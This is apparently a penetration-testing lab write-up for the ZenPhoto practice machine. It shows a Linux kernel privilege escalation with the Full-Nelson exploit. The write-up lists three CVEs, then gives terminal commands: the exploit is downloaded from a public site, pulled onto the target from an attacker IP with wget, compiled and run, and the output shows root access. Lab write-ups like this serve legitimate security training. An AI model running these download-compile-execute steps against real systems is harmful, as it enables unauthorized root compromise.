Full-Nelson
PEAS has identified that the target system is vulnerable to the Full-Nelson exploits, targeting CVE-2012-0056,CVE-2010-3849,CVE-2010-3850
/Practice/ZenPhoto/5-Privilege_Escalation/attachments/{C3D19D7F-1884-44AF-A194-6717119B3A52}.png)
A vulnerability, which was classified as problematic, has been found in Linux Kernel 2.6.16.9. This issue affects the function econet_sendmsg. The manipulation leads to resource management. The identification of this vulnerability is CVE-2010-3849. Furthermore, there is an exploit available.
/Practice/ZenPhoto/5-Privilege_Escalation/attachments/{4DB1000A-28B2-44E6-A525-1208CC6D8287}.png)
A vulnerability, which was classified as problematic, was found in Linux Kernel 2.6.16.9. Affected is the function ec_dev_ioctl. The manipulation leads to access control. This vulnerability is traded as CVE-2010-3850. Furthermore, there is an exploit available.
/Practice/ZenPhoto/5-Privilege_Escalation/attachments/{5DCAC4C3-2280-4290-B7C4-B473E59E3014}.png)
A vulnerability classified as critical has been found in Linux Kernel 2.6.39. Affected is the function mem_write. The manipulation leads to access control. This vulnerability is traded as CVE-2012-0056. Furthermore, there is an exploit available.
Exploit
/Practice/ZenPhoto/5-Privilege_Escalation/attachments/{0C89E503-A4AA-40D7-99BD-2CE1B1009F67}.png)
Exploit available online
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zenphoto]
└─$ wget http://vulnfactory.org/exploits/full-nelson.c
--2025-03-24 15:20:14-- http://vulnfactory.org/exploits/full-nelson.c
Resolving vulnfactory.org (vulnfactory.org)... 198.54.116.186
Connecting to vulnfactory.org (vulnfactory.org)|198.54.116.186|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9400 (9.2K) [text/plain]
Saving to: ‘full-nelson.c’
full-nelson.c 100%[============================>] 9.18K --.-KB/s in 0s
2025-03-24 15:20:15 (490 MB/s) - ‘full-nelson.c’ saved [9400/9400]Downloading the exploit
Exploitation
www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/full-nelson.cDelivery complete
www-data@offsecsrv:/var/tmp$ gcc full-nelson.c -o full-nelsonCompile
www-data@offsecsrv:/var/tmp$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf82322d0
[+] Resolved econet_ops to 0xf82323c0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
offsecsrv
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:50:56:9e:5f:f6 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
inet6 fe80::250:56ff:fe9e:5ff6/64 scope link
valid_lft forever preferred_lft foreverSystem level compromise